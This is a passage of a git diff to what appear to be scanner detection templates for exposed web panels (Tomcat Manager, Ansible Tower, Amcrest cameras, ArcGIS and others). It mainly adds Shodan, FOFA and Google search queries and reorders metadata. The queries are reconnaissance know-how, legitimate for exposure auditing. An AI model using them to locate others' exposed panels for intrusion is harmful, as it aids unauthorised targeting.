a/http/exposed-panels/algonomia-panel.yaml +++ b/http/exposed-panels/algonomia-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://algonomia.com/ metadata: - max-request: 1 verified: true - tags: tech,algonomia,detect + max-request: 1 + tags: tech,algonomia,detect,panel http: - method: GET @@ -26,4 +26,4 @@ http: - 'contains_any(to_lower(body), "leafplatform", "leaf platform")' - 'contains(header, "application/json")' condition: and -# digest: 4a0a00473045022100ff5536d3dfdcb976dcd4503accb90ac13151051a893b39f39700d80c2000ba4f02202687865badadf7416daf098d666637171508ee9b0865f3b18c3391f8448e49d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5d227a587a0dd1e8aa0680ebfc58322b8aad42026ca928c0f0c7d31667fd087022100c4efb066b3570e33b458f4dec39ec57d156664eaf9635ccdc6d45cab5bd6f2db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/allied-telesis-exposure.yaml b/http/exposed-panels/allied-telesis-exposure.yaml index b8e48488e2..68af70f028 100644 --- a/http/exposed-panels/allied-telesis-exposure.yaml +++ b/http/exposed-panels/allied-telesis-exposure.yaml @@ -11,11 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 - product: device_gui - shodan-query: title:"Allied Telesis Device GUI" - vendor: allied_telesis verified: true + max-request: 1 + vendor: allied_telesis + product: device_gui + shodan-query: + - title:"Allied Telesis Device GUI" + - http.title:"allied telesis device gui" + fofa-query: title="allied telesis device gui" + google-query: intitle:"allied telesis device gui" tags: panel,allied,allied_telesis http: @@ -38,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee028fb7d8d6ac97c18dca4a3bfad7955ccd4c636f8a6fc017f2ff150f56700302207da21269f555a6a7ac988509c3799af6823420b112f4879cc9a9c7ae7e775b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1c64f3abf9dbdf36385d48cb4e33f48282dc5831e696ca347031db2a4b41ab202201b719f73f35b61281170cc4dd30d965646480097f8516b9a6e157cb2152a35f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index bb84700507..4585641749 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:ambari:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ambari vendor: apache + product: ambari tags: panel,apache,ambari,exposure http: @@ -26,4 +26,4 @@ http: - 'Ambari' - 'href="http://www.apache.org/licenses/LICENSE-2.0"' condition: and -# digest: 490a0046304402204acc787ea236f0c2b4073dd4042b4cac95511ea9f6e9ed03d23855b0c1c94aeb02200e69631855bfc6da502fb4eb99f610caa62e18bd66806eec5b1d32a54ece8e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7cd3582c3e2f83adc8c2cd6891b6b7fae253b6180d8ada0356ff348f395377d022011048d53eb102cfb96ba8f20f25ce688f1f923a96104bb8117b00e0f9c3c8b6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/amcrest-login.yaml b/http/exposed-panels/amcrest-login.yaml index 48ae7581eb..d9033386b7 100644 --- a/http/exposed-panels/amcrest-login.yaml +++ b/http/exposed-panels/amcrest-login.yaml @@ -11,11 +11,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:amcrest:ip2m-853ew:*:*:*:*:*:*:*:* metadata: - google-query: intext:"amcrest" "LDAP User" max-request: 1 - product: ip2m-853ew - shodan-query: html:"amcrest" vendor: amcrest + product: ip2m-853ew + shodan-query: + - html:"amcrest" + - http.html:"amcrest" "ldap user" + - http.html:"amcrest" + google-query: + - intext:"amcrest" "LDAP User" + - intext:"amcrest" "ldap user" + fofa-query: + - body="amcrest" "ldap user" + - body="amcrest" tags: panel,camera,amcrest,edb http: @@ -34,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022076db99c5e7b0ee2361529fdd9a29ce7c0698b7a64eace323912e6f406a5e3f7c022100bb938751370e22690a0d7167a0907e0734bf8f730c5519254063c551eafa7a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f9c0dd609d107a50226fd6f79a5f214c3444c957cc50beda4bced915db7a9fb022100d25051dc82a1d3237125e444204c5cdf2091b0eee8fc732608b63b6d79040e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ametys-admin-login.yaml b/http/exposed-panels/ametys-admin-login.yaml index 33bacdeae1..286d9c7b8b 100644 --- a/http/exposed-panels/ametys-admin-login.yaml +++ b/http/exposed-panels/ametys-admin-login.yaml @@ -10,8 +10,8 @@ info: cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ametys vendor: ametys + product: ametys tags: panel,ametys,cms http: @@ -37,4 +37,4 @@ http: group: 1 regex: - ' ([0-9.]+)' -# digest: 4a0a00473045022100c8879733aff3c8bd50703cabb23bc24eacdfe95e5ce14302a968ecf962b29767022033238a5f9c57cefeb35023713b7506e88aec8ed590fd10b75bcf11442e23b951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008835b782457a7745406c69d6d21ccb288e5cbd2ef7f2dc2c1c2177388406c336022072ff5a5d7ce60cdc1b8b9728677897d20521d0b4ed384f7b39cc5a41091c0e9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/amp-application-panel.yaml b/http/exposed-panels/amp-application-panel.yaml index ffbe2c2331..170b5b7e33 100644 --- a/http/exposed-panels/amp-application-panel.yaml +++ b/http/exposed-panels/amp-application-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: amp - shodan-query: title:"AMP - Application Management Panel" - vendor: cubecoders verified: true + max-request: 1 + vendor: cubecoders + product: amp + shodan-query: + - title:"AMP - Application Management Panel" + - http.title:"amp - application management panel" + fofa-query: title="amp - application management panel" + google-query: intitle:"amp - application management panel" tags: panel,amp,cubecoders http: @@ -32,4 +36,4 @@ http: part: header words: - "text/html" -# digest: 490a00463044022001f279a936bf2746faf11df9f5e6c7ec5dfcb230319b17e97649696af44561f602203d4cd614cdc13e7c5718cc1e8c9fad14b631666ee55b676a4c32c4365b3ed320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea5d9eaa88d91fc72e786ba5eed3312a77dad1c0b0f27d32031e8e75a0676877022027dd7d4d4ee5edfdd029fc6cee265993d6e45df213e130dec052f64dd140a798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ampache-panel.yaml b/http/exposed-panels/ampache-panel.yaml index 1efadb34ec..24677da491 100644 --- a/http/exposed-panels/ampache-panel.yaml +++ b/http/exposed-panels/ampache-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: ampache - shodan-query: http.title:"For the Love of Music" - vendor: ampache verified: true + max-request: 3 + vendor: ampache + product: ampache + shodan-query: + - http.title:"For the Love of Music" + - http.title:"for the love of music" + fofa-query: title="for the love of music" + google-query: intitle:"for the love of music" tags: panel,ampache http: @@ -45,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022026ff670001f355854261f51aa9568db44aab6ef281df0e668e39bca7245c0c22022018267c7949b2c76dfc72631a00c2dc64303405e61e78e4c3e6ec00de060befbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d8398d263a5878589ae2dc0eae94de2462f532c5a71acb5a53b150021a71d7002210088119148d48f2649a1c57643ad071cc83f0b2536fa1c2023bff0d7446f08913c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/amprion-gridloss-panel.yaml b/http/exposed-panels/amprion-gridloss-panel.yaml index 6ec032abcf..897898690a 100644 --- a/http/exposed-panels/amprion-gridloss-panel.yaml +++ b/http/exposed-panels/amprion-gridloss-panel.yaml @@ -9,9 +9,10 @@ info: reference: - https://www.amprion.net/index-2.html metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,amprion,login,detect + http: - method: GET path: @@ -30,4 +31,4 @@ http: group: 1 regex: - '"envTitle":"([A-Z0-9a-z]+)"' -# digest: 4a0a0047304502204392a65022d7ce48d4f84ab1110cccde1b8861c5179c36c92af33872bb60f695022100b0d9d273907a28033a78aafb11d0fd33963d37f04d7be7712afef0d80de5018b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cc89cfdb0832a98b9157cb3af86cb015d22420c79646327ba15713f7e7e34d102210080606341562eda1d3b36c97f5043e9adad1b4f760a9d9a99d51ca9708cd99a56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/anaqua-login-panel.yaml b/http/exposed-panels/anaqua-login-panel.yaml index 910fd83a12..10d0b4c80e 100644 --- a/http/exposed-panels/anaqua-login-panel.yaml +++ b/http/exposed-panels/anaqua-login-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" - verified: true tags: anaqua,login,panel http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201189396d086e2b7bb798f88291df48a4d16eeeb737952f35ad48a022999bf28a022100a648a6cd84fa8c2aa9da5a3477b096fd0e71be1224ee429dff3c0c86676d824a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100872c9ff2b4876c6d93b9122b56ebdff4615b6ee6404f210d69507665d689320c022046f8633e5b5d80aa8879cbda70defcf89b4462a71a0122e8b49230f435fb6355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ansible-tower-exposure.yaml b/http/exposed-panels/ansible-tower-exposure.yaml index 61046db509..ae0e3ab854 100644 --- a/http/exposed-panels/ansible-tower-exposure.yaml +++ b/http/exposed-panels/ansible-tower-exposure.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Ansible Tower" max-request: 1 - product: ansible_tower - shodan-query: title:"Ansible Tower" vendor: redhat + product: ansible_tower + shodan-query: + - title:"Ansible Tower" + - http.title:"ansible tower" + google-query: + - intitle:"Ansible Tower" + - intitle:"ansible tower" + fofa-query: title="ansible tower" tags: panel,ansible,redhat http: @@ -38,4 +43,4 @@ http: part: body regex: - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' -# digest: 4b0a00483046022100aba5282f230e4fdfd2d981a9a1c2eec10254015b4d2a2fbc1b26370b80b4395e022100b676c5e2e3f6a82728f398bef3ff80ab2cc18a24987b5f81c7ef597296ea0f69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220539e7c2425031fc80bc863c9a45835ec5834a9200d7593a165ae5c28f403ede30221009506ce4e04cd5694d7d425c6f15e4e063a8db2459739f989bddfa2a3e285d175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache-jmeter-dashboard.yaml b/http/exposed-panels/apache-jmeter-dashboard.yaml index e104e72e0b..7b6c5496b4 100644 --- a/http/exposed-panels/apache-jmeter-dashboard.yaml +++ b/http/exposed-panels/apache-jmeter-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:jmeter:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jmeter - shodan-query: title:"Apache JMeter Dashboard" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: jmeter + shodan-query: + - title:"Apache JMeter Dashboard" + - http.title:"apache jmeter dashboard" + fofa-query: title="apache jmeter dashboard" + google-query: intitle:"apache jmeter dashboard" tags: apache,jmeter,panel http: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eb1037efc1fcc4364852312de1e209a9c5c8f63370a2aa20fe94a5769e4d1f1b022100bd3d0e91dac1f7227fa5ed97915b314c793c608f80806675bf6fcd2aaac8179c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ab028aa0be07b3845dda723e535ab34d9c61dbbdf98094d5aa929c9342a2a100220048d88a44c7b980b1c99ed057bda0a22f7712a6d25c7531dadf2280f52c4565c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index d34749989a..868e671cb2 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -10,9 +10,13 @@ info: cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: apisix vendor: apache - fofa-query: title="Apache APISIX Dashboard" + product: apisix + fofa-query: + - title="Apache APISIX Dashboard" + - title="apache apisix dashboard" + shodan-query: http.title:"apache apisix dashboard" + google-query: intitle:"apache apisix dashboard" tags: apache,apisix,panel,login,detect http: @@ -37,4 +41,4 @@ http: group: 1 regex: - '(?i)Server:\s+APISIX\/([0-9.]+)' -# digest: 490a00463044022077db8164de460b6d9fad9c437f6f20ddff3d1130da4410d3e8fef855a71f69cc02205e85b466ed5fc18cbf90faa089c1beeae3b91c11e43f89454ab0b3eca85e9f73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c1659ae1ee866d323b03f2da39b3ca0cc8602892d49cee03ea606a6a26a9020402203b0aef21ab6728cfc77c4fc523aed949c8ad4e10fad73c8c0bb21ec6b5bb9507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/apache-mesos-panel.yaml b/http/exposed-panels/apache/apache-mesos-panel.yaml index b482f4fd1b..3786672898 100644 --- a/http/exposed-panels/apache/apache-mesos-panel.yaml +++ b/http/exposed-panels/apache/apache-mesos-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:mesos:*:*:*:*:jenkins:*:*:* metadata: - fofa-query: app="APACHE-MESOS" - max-request: 2 - product: mesos - shodan-query: http.title:"Mesos" - vendor: apache verified: true + max-request: 2 + vendor: apache + product: mesos + shodan-query: + - http.title:"Mesos" + - http.title:"mesos" + fofa-query: + - app="APACHE-MESOS" + - app="apache-mesos" + - title="mesos" + google-query: intitle:"mesos" tags: panel,apache,mesos http: @@ -38,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9ad35c3dfc30dcfd03d982738cf7fc2177db2271595789a62aeadecfdc646b2022100bb27c79a50dd8db5a5a9423a629e2166c4757ea8e9962a89028005b0454d20b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207eb462806ac9ecdc72e5c85e24ca9b874899b4497210f0458f3a85792068811c022100dd36912801febfd85cf8253f64a2dd92a365450c8c3345a9eae1675458ac98d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/public-tomcat-manager.yaml b/http/exposed-panels/apache/public-tomcat-manager.yaml index f7cd1ea593..52a0814064 100644 --- a/http/exposed-panels/apache/public-tomcat-manager.yaml +++ b/http/exposed-panels/apache/public-tomcat-manager.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: tomcat - shodan-query: title:"Apache Tomcat" vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: panel,tomcat,apache http: @@ -36,4 +44,4 @@ http: - 401 - 200 condition: or -# digest: 490a00463044022051da4071917dfc40eb9d5739e05591234a77712988ef81a6e2817124c4d71e9002202bb604ba99eb68737e389afaf6b0abcee20c49f920ddd1a087b257c3716f9353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b80b030b079c5740a1b298a952d757dd6d2ccfeb9bb919923950461091bb2ce022100988d6c0922720fe9c80d35d1add8b541575030a628666bdf120bb2fb898de356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apigee-panel.yaml b/http/exposed-panels/apigee-panel.yaml index bd38bff268..288da10a9e 100644 --- a/http/exposed-panels/apigee-panel.yaml +++ b/http/exposed-panels/apigee-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://cloud.google.com/apigee?hl=en metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" - verified: true tags: panel,apigee,login http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'Version:?\s+([0-9.]+)' -# digest: 4a0a00473045022024de85a2064b59024b17d948274dc76df5c6bd4686e677536a0d2fecf1a4caeb022100de0d18e50fc7b9dd92022639756256b0c98e3a3db454035d1565be64993edccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220524151169f980a554d3e7ff11606feaa5c8639660c28bb3ba5a163c626c2cb9c022100f7381164749d9531457a052dcd167f038153fb69e2e33edda8448d75d071a9a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appsmith-web-login.yaml b/http/exposed-panels/appsmith-web-login.yaml index b28180205b..197e8cb077 100644 --- a/http/exposed-panels/appsmith-web-login.yaml +++ b/http/exposed-panels/appsmith-web-login.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: appsmith product: appsmith shodan-query: http.title:"appsmith" - vendor: appsmith - verified: true + fofa-query: title="appsmith" + google-query: intitle:"appsmith" tags: panel,appsmith http: @@ -34,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7b37c5f11fd7dd4e640706ad39c91ce1f95968e05549a1d3f23c41435625d62022067a75ce8709378d433fe824633e2fbc0596e3d3648681b856cd89fcbadb7dc2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f060efe24574841bce0dbb6a29946acbef08ae56b00d54456c43b78b573f127302210094ca14bfaf4792c356fcc051e42705d413ed873a759b50dce7e2a5b3e643ac3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appspace-panel.yaml b/http/exposed-panels/appspace-panel.yaml index f571068619..3ff08a118d 100644 --- a/http/exposed-panels/appspace-panel.yaml +++ b/http/exposed-panels/appspace-panel.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:appspace:appspace:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: appspace - shodan-query: title:"Appspace" - vendor: appspace verified: true + max-request: 3 + vendor: appspace + product: appspace + shodan-query: + - title:"Appspace" + - http.title:"appspace" + fofa-query: title="appspace" + google-query: intitle:"appspace" tags: appspace,panel,detect http: @@ -44,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d0756e6e209352ea0ac90827c785e76a43448ce465c4a17674774cc59afecdff022100c126685413b98a7d183497b337ff43ddc5a39fa1bb9ea5b12f356761517fe22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c5fba61829c0cc8b81dd4a23f8d8642aa1cb387790923ef718add02e3e137920220664fe8c3a27256106ba887dac1034603164146e08bedcf58fb9b6ccc4c42a589:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appsuite-panel.yaml b/http/exposed-panels/appsuite-panel.yaml index b47bd4d72d..f7f03fece3 100644 --- a/http/exposed-panels/appsuite-panel.yaml +++ b/http/exposed-panels/appsuite-panel.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: open-xchange_appsuite - shodan-query: html:"Appsuite" - vendor: open-xchange verified: true + max-request: 1 + vendor: open-xchange + product: open-xchange_appsuite + shodan-query: + - html:"Appsuite" + - http.html:"appsuite" + fofa-query: body="appsuite" tags: panel,appsuite,detect,open-xchange http: @@ -34,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220357235264a8080fbb79afab06fc6d88dfbf974dfc4e18971f90ba1f8a3a81e6e02203cf71150238153cc7029218157a44a4a7717a9b4b9cba32f4b45db904cfbe5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022073801f0fcda64f01e8e1fba32b036f8a38cf4294e16d1391689b3328c9166e08022100c22764748554aca34bfa628d439cc357abeda378fbcdace20d8bcde83d3756d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appwrite-panel.yaml b/http/exposed-panels/appwrite-panel.yaml index 4329c6b34e..30bfbb536a 100644 --- a/http/exposed-panels/appwrite-panel.yaml +++ b/http/exposed-panels/appwrite-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: appwrite - shodan-query: http.favicon.hash:-633108100 - vendor: appwrite verified: true + max-request: 2 + vendor: appwrite + product: appwrite + shodan-query: + - http.favicon.hash:-633108100 + - http.title:"sign in - appwrite" + fofa-query: + - icon_hash=-633108100 + - title="sign in - appwrite" + google-query: intitle:"sign in - appwrite" tags: panel,appwrite,detect http: @@ -28,4 +34,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))" -# digest: 4a0a004730450221009f999f1d004f9ce9dc9aa7216e4b888b0638238feb67a00e5df42e973b6151590220347658bd3f22464e6f9c94f8121069d9aaeb9294ee6fe7407fb4e9eda4971527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220409b756e97bbd8ec40013112f3e1206086c79f2af2bcbbac72a72cd18bf2ac32022056fa7f4cb8dd18a71c06a52f8e76ecbcac6e73562efa1ad5031416aeb56404b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aqua-enterprise-panel.yaml b/http/exposed-panels/aqua-enterprise-panel.yaml index 45ed002380..2883327b0d 100644 --- a/http/exposed-panels/aqua-enterprise-panel.yaml +++ b/http/exposed-panels/aqua-enterprise-panel.yaml @@ -12,10 +12,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Aqua Cloud Native Security Platform" + verified: true max-request: 1 shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" - verified: true + google-query: intitle:"Aqua Cloud Native Security Platform" tags: panel,aqua,aquasec http: @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220593d2e3c0053ffb4805eb449e8128d62c48270b1f22b228bd3b55f66c19b5b3c0220671474cb61608750a9c4182d05be825663967cea331656a7048979a5a99a61c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f291e03e7e08d9da1a5b9058b14126dfaf36b5c35f5b745b54b493048aba3d602203592e4106630a3fd3491c153baf0475cfb6a5851b5c34f0e4e3c99a6b2dd94ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index 2b2ff1ee32..f756a330a3 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:arangodb:arangodb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: arangodb - shodan-query: http.title:"ArangoDB Web Interface" - vendor: arangodb verified: "true" + max-request: 1 + vendor: arangodb + product: arangodb + shodan-query: + - http.title:"ArangoDB Web Interface" + - http.title:"arangodb web interface" + fofa-query: title="arangodb web interface" + google-query: intitle:"arangodb web interface" tags: panel,arangodb,login http: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5e79f701c8ae32d77121cec5ed1e9fabae11c849f798f1618fdfb5fd5a6cbc0022100a47a6d129ae459f8744c509ad9ab8a9223417a903ab0781b9daf4114ca2edb09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ab99e3f8fd709a394354710d276428d3f1a77af8fb3f0580747c7c8a57394e502207424c2fb625449bb7de94c6b3f5d6c08d44f5e93ca37ade00d324dd1cafa3acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arcgis/arcgis-panel.yaml b/http/exposed-panels/arcgis/arcgis-panel.yaml index 3d7e132178..87ff818f3e 100644 --- a/http/exposed-panels/arcgis/arcgis-panel.yaml +++ b/http/exposed-panels/arcgis/arcgis-panel.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:esri:arcgis_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: arcgis_enterprise vendor: esri + product: arcgis_enterprise tags: docs,arcgis,cms,panel,esri http: @@ -46,4 +46,4 @@ http: regex: - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' -# digest: 4a0a004730450220281ad388414a5d110cfd5a7c7e9785b4aadcb95d806f94ecc6259d78b8b79a04022100b1a6fb2363b60f1e9b677cf1f4cf12abd8088cd5b53a6659d95408c585b82bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220051fd278c3396e72c511f158ec4e383e9322d6f9f15c57f8289d4188e565df47022062b9f6a180fa457ea406d2fe17adbee6b61e45e874762a3e89b53c2757f808e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arcgis/arcgis-services.yaml b/http/exposed-panels/arcgis/arcgis-services.yaml index df59cea6e3..d46eb34e78 100644 --- a/http/exposed-panels/arcgis/arcgis-services.yaml +++ b/http/exposed-panels/arcgis/arcgis-services.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: arcgis_server - shodan-query: title:"ArcGIS" - vendor: esri verified: true + max-request: 1 + vendor: esri + product: arcgis_server + shodan-query: + - title:"ArcGIS" + - http.title:"arcgis" + fofa-query: title="arcgis" + google-query: intitle:"arcgis" tags: panel,arcgis,rest,api,detect,esri http: @@ -40,4 +44,4 @@ http: group: 1 regex: - 'Current Version:\s*<\/b>\s*([0-9.]+)' -# digest: 4b0a00483046022100dff450061a964e5a154028977c3f879fa27f91712b0b4f7e8295b07199618444022100a508425811e5aee07eab739f769239323b52761d47bdcb35bbe0a980dc972661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049b3f456bfc40eaf087e91c971030226f4f85bca2d7e0cda3dfb264d9b021aaf022100de51217ac9cef5b094e0c97fd54e812fb3a7a7dba61a2a5a7c568e409f183f35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/archibus-webcentral-panel.yaml b/http/exposed-panels/archibus-webcentral-panel.yaml index de30e0b585..c61db45995 100644 --- a/http/exposed-panels/archibus-webcentral-panel.yaml +++ b/http/exposed-panels/archibus-webcentral-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:archibus:web_central:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 3 + vendor: archibus product: web_central shodan-query: http.favicon.hash:889652940 - vendor: archibus - verified: true + fofa-query: icon_hash=889652940 tags: panel,archibus http: @@ -45,4 +46,4 @@ http: - type: status status: - 200 -# digest: 480a00453043021f1cbba93982a7f1c97794f66bd60726effad52b19e796a50366f2c2ec0985c9022064cf1708246f9077607c98961aa4245a793af499d6e4440a25555aeb3d772788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2c0c4234287774d9ea4b1054f8a1805fdee61fdaa69bf1ea65ee2a3aedf2fc3022100ca0720ccb3c0c1e297745a5f318f26e16407fb1bc56940d1042022b5d685b2e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index 4b8a7cacf1..6a742f37f2 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -10,12 +10,14 @@ info: classification: cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="-1889244460" - max-request: 1 - product: udp - shodan-query: http.favicon.hash:-1889244460 - vendor: arcserve verified: true + max-request: 1 + vendor: arcserve + product: udp + shodan-query: + - http.favicon.hash:-1889244460 + - http.favicon.hash:"-1889244460" + fofa-query: icon_hash="-1889244460" tags: panel,login,arcserve,detect http: @@ -35,4 +37,4 @@ http: - type: status status: - 200 -# digest: 